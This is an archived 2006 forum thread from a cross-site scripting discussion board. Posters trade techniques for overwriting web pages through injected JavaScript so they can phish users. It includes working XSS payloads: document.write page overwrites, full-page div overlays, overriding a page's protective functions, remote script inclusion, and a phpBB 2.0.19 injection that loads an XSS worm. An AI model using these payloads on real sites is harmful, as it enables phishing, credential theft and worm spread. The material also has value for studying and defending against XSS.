Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Overwriting a page
Posted by: rsnake
Date: August 20, 2006 07:01PM

I got an email a while back from Blad3 talking about ways to overwrite an entire page so that you can phish from it. I've seen a few really huge ways, using setTimeout or whatever. All of those seem way way too complicated and glitchy. The best way I've seen is to use a simple command like:

<body onload="document.write('owned')">

That overwrites the entire page because after the page has finished loading, document.write doesn't know where to start writing to since you aren't using appendChild. Once you output the text to the page it overwrites the entire page with the content. It's also very short and very reliable, which is why I like it.

Options: ReplyQuote
Re: Overwriting a page
Posted by: web
Date: August 21, 2006 03:39AM

I was just wondering about this a couple of days ago. I'm suprised I didn't think of this.

Thanks!

Options: ReplyQuote
Re: Overwriting a page
Posted by: WhiteAcid
Date: August 21, 2006 03:50AM

Why would you want to write over a page? I thought the whole point was to make them think they are on a valid site while not actually being on one. So instead of overwriting the page you'd just change the target attribute of forms, or implement a JS key logger.

There's also plenty of other ways like document.body.innerHTML = "new content", and if you really wanted you could create a new div tag which goes over everything else by injecting something like <div style="width:100%;height:100%;position:absolute;top:0px;left:0px;background-color:#fff;z-index:99;">content here</div>

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Overwriting a page
Posted by: rsnake
Date: August 21, 2006 10:02AM

WhiteAcid, there are many reasons you might want to do this. Take the expect vulnerability for example. Clearly, the text on the page doesn't convince anyone that they are on a valid web page, so you need to overwrite it. Say you are on a page that is like a web-board and it is XSS-able, but the sign-in page is not. You can create an onclick event that does a document.write (or a series of them) to create the sign-in page on the forum since the user is probably expecting to have to sign-in anyway. It comes in handy.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Overwriting a page
Posted by: WhiteAcid
Date: August 21, 2006 10:52AM

Ah yes, I didn't think of that scenario.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Overwriting a page
Posted by: rsnake
Date: August 22, 2006 12:32PM

It also occured to me, there also is an advantage if you want to break any of the JavaScript protections on a page. If the page says you cannot do certain things, it can help break out of those restrictions.

Options: ReplyQuote
Re: Overwriting a page
Posted by: WhiteAcid
Date: August 22, 2006 12:40PM

Actually, a simpler solution to get around JS functions (this only works if they are functions) is to create a new function of the same name but with no content. Run the following code and you'll see that both alerts display 'foobar'.
<script>
function foo(){alert('bar')}
foo()
function foo(){alert('foobar')}
foo()
</script>
and the following code does nothing:
<script>function foo(){alert('bar')}
foo()
function foo(){alert('foobar')}
foo()
function foo() {}
foo()
</script>

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Overwriting a page
Posted by: rsnake
Date: August 22, 2006 01:02PM

How is that simpler than:

<body onload="document.write('owned')">

Options: ReplyQuote
Re: Overwriting a page
Posted by: Dave
Date: August 22, 2006 01:12PM

You don't have to build your own layout...

Options: ReplyQuote
Re: Overwriting a page
Posted by: WhiteAcid
Date: August 22, 2006 01:49PM

Well... it depends. If let's say you are injecting into login.php and want to keep it looking like login.php but want to get rid of a function, then overwriting the function may be the best way. On the other hand, if you're XSSing (I'm officially making that a verb) index.php to look like login.php, then your way may be easier.

Also, if the JS function is called from an external file then document.write('owned') doesn't scrap the function. I just tried hacking together something to remove all external scripts, but so far I haven't got it working. I'll try a bit more but if I can't get it within the next 5-10 minutes I'll go back to my previous work.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Overwriting a page
Posted by: rsnake
Date: August 22, 2006 03:23PM

Dave, that's true, but in most cases where you want to overwrite the whole page, you want to re-write the page anyway. I'm really talking about in the case where a) you want to overwrite the whole page (the title of the original post) and b) want to disable functions.

WhiteAcid, yah, I was talking about using document.write to output whatever... not to call remote functions... that won't work. But if you document.write a <script src that will work. IE:

<BODY ONLOAD="document.write('<script src=http://ha.ckers.org/xss.js></script>')">

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Overwriting a page
Posted by: Girzi
Date: August 23, 2006 07:43AM

rsnake,
<BODY ONLOAD="document.write('<script src=http://ha.ckers.org/xss.js></script>')">
thaht will deface the page and put <script src=http://ha.ckers.org/xss.js></script> on it =) It's very interresting on some board like Phpbb.
Remember phpbb 2.0.19 and its flaw when html is enabled we could inject a script like this :

<pre a='>' onmouseover='document.write("<script src=`http://127.0.0.1/xssvirus/POST/phpbb.js`></script>")' b='<pre' >
Hehehehe
</pre>

Where phpbb.js is a xss Worm =) (seoblackhat => scientifc labs :P)


Anyway, Javascript and XSS are very very interresting =)

Options: ReplyQuote
Re: Overwriting a page
Posted by: rsnake
Date: August 23, 2006 10:18AM

That's exactly right. Any time you just do a document write and it's not part of the loading process, it completely overwrites the visible page. It's a weird effect that basically allows you to control everything on it.

And yes, that includes almost every event handler (all 90+ of them): http://ha.ckers.org/xss.html#XSS_Event_handlers

This is a pretty nasty side effect, that I haven't seen many people talk about, and I am sure it has other uses as well (maybe breaking out of CSS restrictions - but you could do that anyway with JavaScript). I dunno...

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Overwriting a page
Posted by: alf
Date: September 30, 2006 03:59AM

I've done this some time ago, it is really amazing if you are able to "rewrite" an entire page using <div>'s whith position:abosulte and stuff like that.
I really liked it =]

Options: ReplyQuote
Re: Overwriting a page
Posted by: metal_hurlant
Date: September 30, 2006 05:16AM

Just a quick note regarding the event handler list at http://ha.ckers.org/xss.html#XSS_Event_handlers :

It would be interesting to add firefox-specific stuff, such as the ones documented at http://www.xulplanet.com/references/elemref/ref_EventHandlers.html and http://www.xulplanet.com/tutorials/xultu/events.html

Some of those are likely to work in a non-xul context.
(I have a nagging suspicion one can insert inline XUL fragments in a HTML document, but I can't point to a good example of that right now.)


[ also, there's a typo for "24. onDataAvailaible" in your list ]

Options: ReplyQuote


Sorry, only registered users may post in this forum.